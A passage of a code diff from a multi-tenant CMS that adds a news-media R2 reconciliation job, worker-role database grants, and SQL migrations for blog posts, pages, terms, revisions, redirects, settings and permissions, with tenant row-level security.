+ * `sql/041_awcms_news_media_object_registry_schema.sql`'s own header).
+ *
+ * ## Never logs signed URLs, credentials, or object bytes
+ *
+ * Every log line/telemetry field below is a bare `object_key` (e.g.
+ * `news-media/{tenantId}/2026/07/uuid.jpg` — no PII, no credential, per
+ * `news-media-object-key.ts`'s own design), a count, or a provider error
+ * message already truncated/sanitized by `news-media-r2-client.ts`. Nothing
+ * here ever constructs or logs a presigned URL.
+ *
+ * ## `--dry-run`
+ *
+ * Categorizes every active tenant's media rows against the real R2 bucket
+ * listing WITHOUT deleting or modifying anything — safe to run in
+ * production to preview impact. See `news-media-reconciliation.ts`'s own
+ * header for the exact categories (`healthy`/`orphanInDb`/`expiredPending`/
+ * `staleOrphaned`/`orphanInR2`) and the ordering/race-safety guarantees the
+ * REAL (non-dry-run) path applies.
+ */
+import { getWorkerDatabaseClient } from "../src/lib/database/client";
+import {
+  applyJobExitCode,
+  formatJobOutcomeLine,
+  isJobResultOk,
+  parseJobCliArgs,
+  printJobTelemetry,
+  runJob,
+  writeJobTelemetry
+} from "../src/lib/jobs/job-runner";
+import { createNewsMediaR2Client } from "../src/modules/news-portal/infrastructure/news-media-r2-client";
+import { resolveNewsMediaR2Config } from "../src/modules/news-portal/domain/news-media-r2-config";
+import { reconcileNewsMediaForAllTenants } from "../src/modules/news-portal/application/news-media-reconciliation";
+
+async function main() {
+  const config = resolveNewsMediaR2Config();
+  const cliOptions = parseJobCliArgs(process.argv.slice(2));
+
+  if (!config.enabled) {
+    console.log(
+      'news-media:reconcile skipped — NEWS_MEDIA_R2_ENABLED is not "true" (no R2-only news media in use).'
+    );
+    return;
+  }
+
+  // `awcms_worker` least-privilege role — see
+  // `sql/041_awcms_news_media_object_registry_schema.sql`'s
+  // `GRANT SELECT, UPDATE, DELETE ON awcms_news_media_objects TO awcms_worker`.
+  const sql = getWorkerDatabaseClient();
+  const r2Client = createNewsMediaR2Client({
+    accountId: config.accountId,
+    accessKeyId: config.accessKeyId,
+    secretAccessKey: config.secretAccessKey,
+    bucket: config.bucket
+  });
+
+  try {
+    const result = await runJob(
+      {
+        name: "news-media:reconcile",
+        description:
+          "Reconciles awcms_news_media_objects metadata against the real R2 bucket contents; cleans up expired pending uploads and grace-period-expired orphans in bounded batches.",
+        // R2 network calls (list/delete, each individually timeout-bound at
+        // 10s default) across every active tenant can run long on a large
+        // bucket — generous but still bounded, same reasoning
+        // `email:dispatch`'s own timeout override uses.
+        timeoutMs: 30 * 60 * 1000,
+        handler: async (ctx) => {
+          const summary = await reconcileNewsMediaForAllTenants(
+            sql,
+            config,
+            r2Client,
+            { dryRun: ctx.dryRun, signal: ctx.signal }
+          );
+
+          const { totals } = summary;
+          const hadFailures =
+            totals.tenantsWithR2ListFailure > 0 ||
+            totals.expiredPendingDeferred > 0 ||
+            totals.staleOrphanedDeferred > 0 ||
+            totals.orphanInR2Deferred > 0;
+
+          console.log(
+            `news-media:reconcile complete — correlationId=${ctx.correlationId} ` +
+              `tenants=${totals.tenantsChecked} healthy=${totals.healthy} ` +
+              `orphanInDb=${totals.orphanInDb} ` +
+              `expiredPending(total=${totals.expiredPendingTotal},deleted=${totals.expiredPendingDeleted},racedSkipped=${totals.expiredPendingRacedSkipped},deferred=${totals.expiredPendingDeferred}) ` +
+              `staleOrphaned(total=${totals.staleOrphanedTotal},deleted=${totals.staleOrphanedDeleted},deferred=${totals.staleOrphanedDeferred}) ` +
+              `orphanInR2(total=${totals.orphanInR2Total},eligible=${totals.orphanInR2Eligible},deleted=${totals.orphanInR2Deleted},raceAverted=${totals.orphanInR2RaceAverted},deferred=${totals.orphanInR2Deferred})` +
+              (ctx.dryRun ? " (dry-run: nothing was deleted/modified)" : "") +
+              (totals.tenantsWithR2ListFailure > 0
+                ? ` (WARNING: ${totals.tenantsWithR2ListFailure} tenant(s) had an R2 listing failure this run — skipped, retried next run)`
+                : "")
+          );
+
+          if (totals.orphanInDb > 0) {
+            console.log(
+              `news-media:reconcile — ${totals.orphanInDb} object(s) reported as orphan-in-DB (DB row expects an R2 object that is missing) — REPORT ONLY, no automatic remediation; follow the news_portal R2 backup lifecycle operator SOP.`
+            );
+          }
+
+          return {
+            status: summary.aborted || hadFailures ? "partial" : "success",
+            itemCounts: {
+              tenantsChecked: totals.tenantsChecked,
+              healthy: totals.healthy,
+              orphanInDb: totals.orphanInDb,
+              expiredPendingDeleted: totals.expiredPendingDeleted,
+              staleOrphanedDeleted: totals.staleOrphanedDeleted,
+              orphanInR2Deleted: totals.orphanInR2Deleted
+            },
+            detail: summary.aborted
+              ? "Aborted before every active tenant was processed (timeout/termination) — remaining tenants retried next run."
+              : hadFailures
+                ? "One or more R2 operations were deferred/failed this run (provider outage or listing failure) — retried next run."
+                : undefined
+          };
+        }
+      },
+      { sql, dryRun: cliOptions.dryRun }
+    );
+
+    printJobTelemetry(result);
+    await writeJobTelemetry(result, cliOptions.jsonOutputPath);
+
+    if (!isJobResultOk(result)) {
+      console.error(formatJobOutcomeLine(result));
+    }
+
+    applyJobExitCode(result);
+  } finally {
+    await sql.close({ timeout: 1 });
+  }
+}
+
+if (import.meta.main) {
+  await main();
+}

--- a/scripts/security-readiness.ts
+++ b/scripts/security-readiness.ts
@@ -1010,7 +1010,15 @@ export const WORKER_ROLE_GRANTS: Record<string, string[]> = {
   // approved-but-elapsed backlog, UPDATE those rows to expired. No DELETE, and
   // NO access to awcms_sod_conflict_evaluations (request-path chokepoint only,
   // on awcms_app). The per-exception audit INSERT reuses awcms_audit_events.
-  awcms_sod_conflict_exceptions: ["SELECT", "UPDATE"]
+  awcms_sod_conflict_exceptions: ["SELECT", "UPDATE"],
+  // blog_content — blog:publish:scheduled (sql/035): SELECT the due-post
+  // batch `FOR UPDATE`, UPDATE it to published. No DELETE (status transition
+  // only, never removes a row). SELECT-only on the two tables the content
+  // quality checklist reads (post-term count, tenant checklist policy). The
+  // job's own audit INSERT reuses awcms_audit_events above.
+  awcms_blog_posts: ["SELECT", "UPDATE"],
+  awcms_blog_post_terms: ["SELECT"],
+  awcms_blog_settings: ["SELECT"]
 };
 
 /**

--- a/scripts/security-readiness.ts
+++ b/scripts/security-readiness.ts
@@ -1018,7 +1018,12 @@ export const WORKER_ROLE_GRANTS: Record<string, string[]> = {
   // job's own audit INSERT reuses awcms_audit_events above.
   awcms_blog_posts: ["SELECT", "UPDATE"],
   awcms_blog_post_terms: ["SELECT"],
-  awcms_blog_settings: ["SELECT"]
+  awcms_blog_settings: ["SELECT"],
+  // news_portal — news-media:reconcile (sql/041): SELECT the reconciliation
+  // snapshot, UPDATE claiming pending_upload/uploaded rows to `failed` and
+  // soft-deleting stale `orphaned` rows, DELETE hard-deleting expired `failed`
+  // rows. The job's own audit INSERT reuses awcms_audit_events above.
+  awcms_news_media_objects: ["SELECT", "UPDATE", "DELETE"]
 };
 
 /**

--- a/sql/035_awcms_blog_content_schema.sql
+++ b/sql/035_awcms_blog_content_schema.sql
@@ -1,0 +1,368 @@
+-- `blog_content` module — core content schema. Ported/consolidated from
+-- awcms-mini migrations 026 (foundation schema), 028 (search_vector made a
+-- GENERATED column), 029 (`translation_group_id` columns, presentation
+-- schema split into 037), 050 (`seo_image_media_id`), and 051
+-- (`auto_internal_tag_links_disabled`) — this is a fresh-DB consolidation:
+-- every column below is created in its FINAL shape directly, with no
+-- intermediate ALTER/backfill steps mini needed across its own incremental
+-- issue history. Seven tables: posts, pages, terms (categories/tags),
+-- post-term relations, append-only revisions, redirects, and per-tenant
+-- settings. Presentation/monetization tables (templates/menus/widgets/ads/
+-- theme) and the internal-tag-linking policy table are separate migrations
+-- (037/039) — this one is the module's own core content model.
+--
+-- Every table is tenant-scoped: `tenant_id uuid NOT NULL REFERENCES
+-- awcms_tenants (id)`, `ENABLE ROW LEVEL SECURITY` + `FORCE ROW LEVEL
+-- SECURITY` (sql/019's `awcms_app` connects as a non-owner role, so `ENABLE`
+-- alone would be inert), one `tenant_isolation` policy each (sql/005/008/013
+-- convention). No explicit `GRANT` statements are needed for `awcms_app` on
+-- the tables below: sql/019's `ALTER DEFAULT PRIVILEGES IN SCHEMA public
+-- GRANT SELECT, INSERT, UPDATE, DELETE ON TABLES TO awcms_app` already
+-- covers every table the owning role creates from here on.
+--
+-- `awcms_worker` (sql/022): the `blog:publish:scheduled` job
+-- (`scripts/blog-scheduled-publish.ts`, wired up by migration 036's
+-- permission catalog / this module's own `jobs` descriptor) needs SELECT +
+-- UPDATE on `awcms_blog_posts` (select the due batch `FOR UPDATE`, then
+-- transition it to `published`), SELECT on `awcms_blog_post_terms` (term
+-- count for the content quality checklist), and SELECT on
+-- `awcms_blog_settings` (checklist policy + social preview fallback). Its
+-- own `awcms_audit_events` INSERT is already granted globally in sql/022.
+-- Granted at the bottom of this migration (same "grant exactly what the new
+-- job touches, right where its tables are created" precedent sql/027 set
+-- for `identity-access:business-scope:expiry`).
+
+CREATE TABLE IF NOT EXISTS awcms_blog_posts (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  author_tenant_user_id uuid NOT NULL,
+  title text NOT NULL,
+  slug text NOT NULL,
+  excerpt text,
+  content_json jsonb NOT NULL,
+  content_text text NOT NULL,
+  status text NOT NULL DEFAULT 'draft',
+  visibility text NOT NULL DEFAULT 'public',
+  featured_media_id uuid,
+  -- Explicit "use THIS image for og:image/twitter:image/JSON-LD image"
+  -- override — takes priority over `featured_media_id` when set (mini
+  -- migration 050). A plain, FK-less uuid column, same convention as
+  -- `featured_media_id` itself — this module has no dependency on a media
+  -- registry table (news_media capability, optional/not-yet-ported; see
+  -- module.ts).
+  seo_image_media_id uuid,
+  seo_title text,
+  meta_description text,
+  canonical_url text,
+  locale text NOT NULL DEFAULT 'id',
+  -- Optional translation grouping (multilingual content, mini migration
+  -- 029): linking two rows as translations of each other means setting the
+  -- same `translation_group_id` on both — the application layer's job, no
+  -- trigger needed.
+  translation_group_id uuid,
+  -- Per-post opt-out of automatic internal tag linking (mini migration 051)
+  -- — see migration 039's header for the dedicated per-tenant policy table
+  -- this pairs with.
+  auto_internal_tag_links_disabled boolean NOT NULL DEFAULT false,
+  published_at timestamptz,
+  scheduled_at timestamptz,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now(),
+  deleted_at timestamptz,
+  deleted_by uuid,
+  delete_reason text,
+  restored_at timestamptz,
+  restored_by uuid,
+  version integer NOT NULL DEFAULT 1,
+  -- GENERATED from the start (mini's own migration 028 converted this from
+  -- a plain nullable column to a generated one after the fact; a fresh DB
+  -- can just start here) — PostgreSQL keeps it in sync on every
+  -- INSERT/UPDATE, no application code/trigger, no insert/update drift
+  -- risk. `simple` text search config (language-agnostic): posts/pages mix
+  -- locales per tenant and PostgreSQL has no built-in Indonesian config.
+  -- Weighted: title ('A'), excerpt ('B'), content_text ('C').
+  search_vector tsvector GENERATED ALWAYS AS (
+    setweight(to_tsvector('simple', coalesce(title, '')), 'A') ||
+    setweight(to_tsvector('simple', coalesce(excerpt, '')), 'B') ||
+    setweight(to_tsvector('simple', coalesce(content_text, '')), 'C')
+  ) STORED,
+  CONSTRAINT awcms_blog_posts_status_check
+    CHECK (status IN ('draft', 'review', 'scheduled', 'published', 'archived')),
+  CONSTRAINT awcms_blog_posts_visibility_check
+    CHECK (visibility IN ('public', 'private', 'unlisted'))
+);
+
+CREATE UNIQUE INDEX IF NOT EXISTS awcms_blog_posts_slug_dedup
+  ON awcms_blog_posts (tenant_id, locale, slug)
+  WHERE deleted_at IS NULL;
+
+CREATE INDEX IF NOT EXISTS awcms_blog_posts_tenant_status_published_idx
+  ON awcms_blog_posts (tenant_id, status, published_at DESC);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_posts_tenant_author_idx
+  ON awcms_blog_posts (tenant_id, author_tenant_user_id);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_posts_tenant_deleted_idx
+  ON awcms_blog_posts (tenant_id, deleted_at);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_posts_search_vector_idx
+  ON awcms_blog_posts USING GIN (search_vector);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_posts_translation_group_idx
+  ON awcms_blog_posts (tenant_id, translation_group_id)
+  WHERE translation_group_id IS NOT NULL;
+
+-- Scheduled-publish worker's due-batch scan (`status = 'scheduled' AND
+-- scheduled_at <= now()`, `ORDER BY scheduled_at ASC`, bounded + `FOR UPDATE
+-- SKIP LOCKED`).
+CREATE INDEX IF NOT EXISTS awcms_blog_posts_scheduled_due_idx
+  ON awcms_blog_posts (tenant_id, scheduled_at)
+  WHERE status = 'scheduled' AND deleted_at IS NULL;
+
+ALTER TABLE awcms_blog_posts ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_posts FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_posts_tenant_isolation
+  ON awcms_blog_posts
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- Same core shape as posts, plus page_type/parent_page_id/menu_order.
+CREATE TABLE IF NOT EXISTS awcms_blog_pages (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  author_tenant_user_id uuid NOT NULL,
+  title text NOT NULL,
+  slug text NOT NULL,
+  excerpt text,
+  content_json jsonb NOT NULL,
+  content_text text NOT NULL,
+  status text NOT NULL DEFAULT 'draft',
+  visibility text NOT NULL DEFAULT 'public',
+  featured_media_id uuid,
+  seo_title text,
+  meta_description text,
+  canonical_url text,
+  locale text NOT NULL DEFAULT 'id',
+  translation_group_id uuid,
+  published_at timestamptz,
+  scheduled_at timestamptz,
+  page_type text NOT NULL DEFAULT 'standard',
+  parent_page_id uuid REFERENCES awcms_blog_pages (id),
+  menu_order integer NOT NULL DEFAULT 0,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now(),
+  deleted_at timestamptz,
+  deleted_by uuid,
+  delete_reason text,
+  restored_at timestamptz,
+  restored_by uuid,
+  version integer NOT NULL DEFAULT 1,
+  search_vector tsvector GENERATED ALWAYS AS (
+    setweight(to_tsvector('simple', coalesce(title, '')), 'A') ||
+    setweight(to_tsvector('simple', coalesce(excerpt, '')), 'B') ||
+    setweight(to_tsvector('simple', coalesce(content_text, '')), 'C')
+  ) STORED,
+  CONSTRAINT awcms_blog_pages_status_check
+    CHECK (status IN ('draft', 'review', 'scheduled', 'published', 'archived')),
+  CONSTRAINT awcms_blog_pages_visibility_check
+    CHECK (visibility IN ('public', 'private', 'unlisted')),
+  CONSTRAINT awcms_blog_pages_page_type_check
+    CHECK (page_type IN ('standard', 'landing', 'legal', 'system'))
+);
+
+CREATE UNIQUE INDEX IF NOT EXISTS awcms_blog_pages_slug_dedup
+  ON awcms_blog_pages (tenant_id, locale, slug)
+  WHERE deleted_at IS NULL;
+
+CREATE INDEX IF NOT EXISTS awcms_blog_pages_tenant_status_published_idx
+  ON awcms_blog_pages (tenant_id, status, published_at DESC);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_pages_tenant_author_idx
+  ON awcms_blog_pages (tenant_id, author_tenant_user_id);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_pages_tenant_deleted_idx
+  ON awcms_blog_pages (tenant_id, deleted_at);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_pages_parent_idx
+  ON awcms_blog_pages (parent_page_id);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_pages_search_vector_idx
+  ON awcms_blog_pages USING GIN (search_vector);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_pages_translation_group_idx
+  ON awcms_blog_pages (tenant_id, translation_group_id)
+  WHERE translation_group_id IS NOT NULL;
+
+ALTER TABLE awcms_blog_pages ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_pages FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_pages_tenant_isolation
+  ON awcms_blog_pages
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- Categories and tags. A tag must never carry a parent_id (also re-checked
+-- at the application layer by `domain/taxonomy-policy.ts`'s
+-- `validateTermParent` before this constraint is ever reached).
+CREATE TABLE IF NOT EXISTS awcms_blog_terms (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  taxonomy_type text NOT NULL,
+  parent_id uuid REFERENCES awcms_blog_terms (id),
+  name text NOT NULL,
+  slug text NOT NULL,
+  description text,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now(),
+  deleted_at timestamptz,
+  deleted_by uuid,
+  delete_reason text,
+  CONSTRAINT awcms_blog_terms_taxonomy_type_check
+    CHECK (taxonomy_type IN ('category', 'tag')),
+  CONSTRAINT awcms_blog_terms_tag_no_parent_check
+    CHECK (taxonomy_type <> 'tag' OR parent_id IS NULL)
+);
+
+CREATE UNIQUE INDEX IF NOT EXISTS awcms_blog_terms_slug_dedup
+  ON awcms_blog_terms (tenant_id, taxonomy_type, slug)
+  WHERE deleted_at IS NULL;
+
+CREATE INDEX IF NOT EXISTS awcms_blog_terms_tenant_idx
+  ON awcms_blog_terms (tenant_id, taxonomy_type);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_terms_parent_idx
+  ON awcms_blog_terms (parent_id);
+
+ALTER TABLE awcms_blog_terms ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_terms FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_terms_tenant_isolation
+  ON awcms_blog_terms
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- Post <-> term assignment. Join table carries its own `tenant_id` (not
+-- just derivable through the FKs) so RLS can isolate it directly, same
+-- convention as every other tenant-scoped table in this base.
+CREATE TABLE IF NOT EXISTS awcms_blog_post_terms (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  post_id uuid NOT NULL REFERENCES awcms_blog_posts (id),
+  term_id uuid NOT NULL REFERENCES awcms_blog_terms (id),
+  created_at timestamptz NOT NULL DEFAULT now(),
+  CONSTRAINT awcms_blog_post_terms_unique UNIQUE (post_id, term_id)
+);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_post_terms_tenant_idx
+  ON awcms_blog_post_terms (tenant_id);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_post_terms_term_idx
+  ON awcms_blog_post_terms (term_id);
+
+ALTER TABLE awcms_blog_post_terms ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_post_terms FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_post_terms_tenant_isolation
+  ON awcms_blog_post_terms
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- Append-only revision history: "Revisions are append-only... Restoring a
+-- revision must create a new revision." Same convention as
+-- `awcms_workflow_decisions`/`awcms_audit_events`: a single tenant-isolation
+-- policy, no UPDATE ever issued by application code.
+CREATE TABLE IF NOT EXISTS awcms_blog_revisions (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  resource_type text NOT NULL,
+  resource_id uuid NOT NULL,
+  revision_number integer NOT NULL,
+  title text NOT NULL,
+  content_json jsonb NOT NULL,
+  content_text text NOT NULL,
+  excerpt text,
+  seo_title text,
+  meta_description text,
+  canonical_url text,
+  status text NOT NULL,
+  change_note text,
+  created_by_tenant_user_id uuid NOT NULL,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  CONSTRAINT awcms_blog_revisions_resource_type_check
+    CHECK (resource_type IN ('post', 'page')),
+  CONSTRAINT awcms_blog_revisions_unique
+    UNIQUE (tenant_id, resource_type, resource_id, revision_number)
+);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_revisions_resource_idx
+  ON awcms_blog_revisions (tenant_id, resource_type, resource_id, revision_number DESC);
+
+ALTER TABLE awcms_blog_revisions ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_revisions FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_revisions_tenant_isolation
+  ON awcms_blog_revisions
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- URL redirects (e.g. slug changes) — soft-deletable like other
+-- master/config data, not append-only.
+CREATE TABLE IF NOT EXISTS awcms_blog_redirects (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  from_path text NOT NULL,
+  to_path text NOT NULL,
+  status_code integer NOT NULL DEFAULT 301,
+  reason text,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now(),
+  deleted_at timestamptz,
+  deleted_by uuid,
+  delete_reason text,
+  CONSTRAINT awcms_blog_redirects_status_code_check
+    CHECK (status_code IN (301, 302, 307, 308))
+);
+
+CREATE UNIQUE INDEX IF NOT EXISTS awcms_blog_redirects_from_path_dedup
+  ON awcms_blog_redirects (tenant_id, from_path)
+  WHERE deleted_at IS NULL;
+
+CREATE INDEX IF NOT EXISTS awcms_blog_redirects_tenant_idx
+  ON awcms_blog_redirects (tenant_id);
+
+ALTER TABLE awcms_blog_redirects ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_redirects FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_redirects_tenant_isolation
+  ON awcms_blog_redirects
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- One row per tenant, same shape/convention as `awcms_tenant_settings`:
+-- `tenant_id` itself is the primary key, no separate soft delete (a
+-- settings row is configured, not deleted).
+CREATE TABLE IF NOT EXISTS awcms_blog_settings (
+  tenant_id uuid PRIMARY KEY REFERENCES awcms_tenants (id),
+  default_locale text NOT NULL DEFAULT 'id',
+  default_visibility text NOT NULL DEFAULT 'public',
+  posts_per_page integer NOT NULL DEFAULT 10,
+  seo_default_title text,
+  seo_default_description text,
+  settings jsonb NOT NULL DEFAULT '{}'::jsonb,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now(),
+  CONSTRAINT awcms_blog_settings_default_visibility_check
+    CHECK (default_visibility IN ('public', 'private', 'unlisted'))
+);
+
+ALTER TABLE awcms_blog_settings ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_settings FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_settings_tenant_isolation
+  ON awcms_blog_settings
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- `awcms_worker` (sql/022) — exactly what `blog:publish:scheduled`
+-- (`scripts/blog-scheduled-publish.ts` -> `application/blog-scheduled-
+-- publish.ts`'s `publishDueScheduledPosts`) touches. No DELETE anywhere
+-- (this job never removes a row, only transitions status); no grant on
+-- `awcms_blog_pages`/terms/etc (the job only ever reads/writes posts +
+-- their term ids + tenant settings).
+GRANT SELECT, UPDATE ON awcms_blog_posts TO awcms_worker;
+GRANT SELECT ON awcms_blog_post_terms TO awcms_worker;
+GRANT SELECT ON awcms_blog_settings TO awcms_worker;

--- a/sql/036_awcms_blog_content_permissions.sql
+++ b/sql/036_awcms_blog_content_permissions.sql
@@ -1,0 +1,44 @@
+-- `blog_content` module — core permission catalog seed. Ported from
+-- awcms-mini migration 027, consolidated to this base's permission set
+-- (posts, pages, taxonomies, revisions, settings, seo, search). Presentation
+-- (templates/menus/widgets/ads/theme) and internal-tag-linking permissions
+-- are seeded by migrations 038/040. Wires up `src/modules/blog-content/
+-- module.ts`'s `permissions` declaration. No implicit role grants —
+-- assignable through the existing Access & Users management (RBAC/ABAC),
+-- same as every other module's permission seed.
+--
+-- `awcms_permissions` is a GLOBAL catalog (no tenant_id / no RLS — sql/005);
+-- the unique key is `(module_key, activity_code, action)`, so this insert is
+-- idempotent via `ON CONFLICT ... DO NOTHING`. Existing tenants' `owner`
+-- role does NOT retroactively gain these — only tenants created after this
+-- migration runs get them at setup-wizard bootstrap (which seeds owner from
+-- the catalog).
+INSERT INTO awcms_permissions (module_key, activity_code, action, description)
+VALUES
+  ('blog_content', 'posts', 'read', 'Read blog posts'),
+  ('blog_content', 'posts', 'create', 'Create blog posts'),
+  ('blog_content', 'posts', 'update', 'Update blog posts'),
+  ('blog_content', 'posts', 'publish', 'Publish blog posts'),
+  ('blog_content', 'posts', 'schedule', 'Schedule blog posts for future publishing'),
+  ('blog_content', 'posts', 'archive', 'Archive blog posts'),
+  ('blog_content', 'posts', 'delete', 'Soft delete blog posts'),
+  ('blog_content', 'posts', 'restore', 'Restore soft-deleted blog posts'),
+  ('blog_content', 'posts', 'purge', 'Purge soft-deleted blog posts'),
+  ('blog_content', 'posts', 'export', 'Export blog posts'),
+  ('blog_content', 'pages', 'read', 'Read blog pages'),
+  ('blog_content', 'pages', 'create', 'Create blog pages'),
+  ('blog_content', 'pages', 'update', 'Update blog pages'),
+  ('blog_content', 'pages', 'publish', 'Publish blog pages'),
+  ('blog_content', 'pages', 'archive', 'Archive blog pages'),
+  ('blog_content', 'pages', 'delete', 'Soft delete blog pages'),
+  ('blog_content', 'pages', 'restore', 'Restore soft-deleted blog pages'),
+  ('blog_content', 'pages', 'purge', 'Purge soft-deleted blog pages'),
+  ('blog_content', 'taxonomies', 'read', 'Read blog categories and tags'),
+  ('blog_content', 'taxonomies', 'configure', 'Create, update, or delete blog categories and tags'),
+  ('blog_content', 'revisions', 'read', 'Read blog post/page revision history'),
+  ('blog_content', 'revisions', 'restore', 'Restore a blog post/page revision'),
+  ('blog_content', 'settings', 'read', 'Read blog module settings'),
+  ('blog_content', 'settings', 'configure', 'Update blog module settings'),
+  ('blog_content', 'seo', 'configure', 'Configure blog SEO metadata defaults'),
+  ('blog_content', 'search', 'read', 'Search blog posts and pages')
+ON CONFLICT (module_key, activity_code, action) DO NOTHING;

--- a/sql/037_awcms_blog_content_presentation_schema.sql
+++ b/sql/037_awcms_blog_content_presentation_schema.sql
@@ -1,0 +1,213 @@
+-- `blog_content` module — presentation/monetization schema. Ported from
+-- awcms-mini migration 029 (minus `translation_group_id`, folded into
+-- migration 035's core content schema instead — both `awcms_blog_posts`
+-- and `awcms_blog_pages` already exist by the time this migration runs, so
+-- there is no fresh-DB reason to keep it a separate later ALTER).
+--
+-- Per mini's own Scope Control: this does NOT rebuild the base media
+-- library, base tenant system, base RBAC/ABAC, base audit, or the base
+-- theme engine (`awcms_tenants.default_theme`) — `awcms_blog_theme_settings`
+-- below is a blog-scoped *override* of that tenant default, not a parallel
+-- theme engine. Media/gallery is deliberately NOT a new table here: there is
+-- no base media library to integrate with beyond the already-loose
+-- `featured_media_id`/`seo_image_media_id` uuid references on posts/pages
+-- (no FK), so gallery support is a whitelisted `content_json` block type
+-- instead (see `domain/content-block-rendering.ts`).
+--
+-- No explicit `GRANT` statements needed — sql/019's `ALTER DEFAULT
+-- PRIVILEGES` already covers every new table the owning role creates (same
+-- reasoning migration 035 documents). None of these tables are touched by
+-- the `blog:publish:scheduled` worker, so no `awcms_worker` grant either.
+
+-- Templates: tenant-scoped named layout configurations. `layout_json` is a
+-- whitelisted shape validated at the application layer
+-- (`domain/template-policy.ts`), never arbitrary script — template
+-- rendering must stay within safe predefined layout rules.
+CREATE TABLE IF NOT EXISTS awcms_blog_templates (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  key text NOT NULL,
+  name text NOT NULL,
+  layout_json jsonb NOT NULL DEFAULT '{}'::jsonb,
+  is_active boolean NOT NULL DEFAULT true,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now(),
+  deleted_at timestamptz,
+  deleted_by uuid,
+  delete_reason text
+);
+
+CREATE UNIQUE INDEX IF NOT EXISTS awcms_blog_templates_key_dedup
+  ON awcms_blog_templates (tenant_id, key)
+  WHERE deleted_at IS NULL;
+
+ALTER TABLE awcms_blog_templates ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_templates FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_templates_tenant_isolation
+  ON awcms_blog_templates
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- Menus: tenant-scoped named navigation trees.
+CREATE TABLE IF NOT EXISTS awcms_blog_menus (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  key text NOT NULL,
+  name text NOT NULL,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now(),
+  deleted_at timestamptz,
+  deleted_by uuid,
+  delete_reason text
+);
+
+CREATE UNIQUE INDEX IF NOT EXISTS awcms_blog_menus_key_dedup
+  ON awcms_blog_menus (tenant_id, key)
+  WHERE deleted_at IS NULL;
+
+ALTER TABLE awcms_blog_menus ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_menus FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_menus_tenant_isolation
+  ON awcms_blog_menus
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- Menu items: hierarchical (self-FK `parent_item_id`, same one-level-parent
+-- convention as `awcms_blog_terms`). `link_type` gates which of
+-- `target_id`/`url` is meaningful — "internal blog content" (post/page id)
+-- or a "safe external URL" (unsafe URLs rejected at the application layer,
+-- `domain/menu-policy.ts`'s reuse of `seo-validation.ts`'s
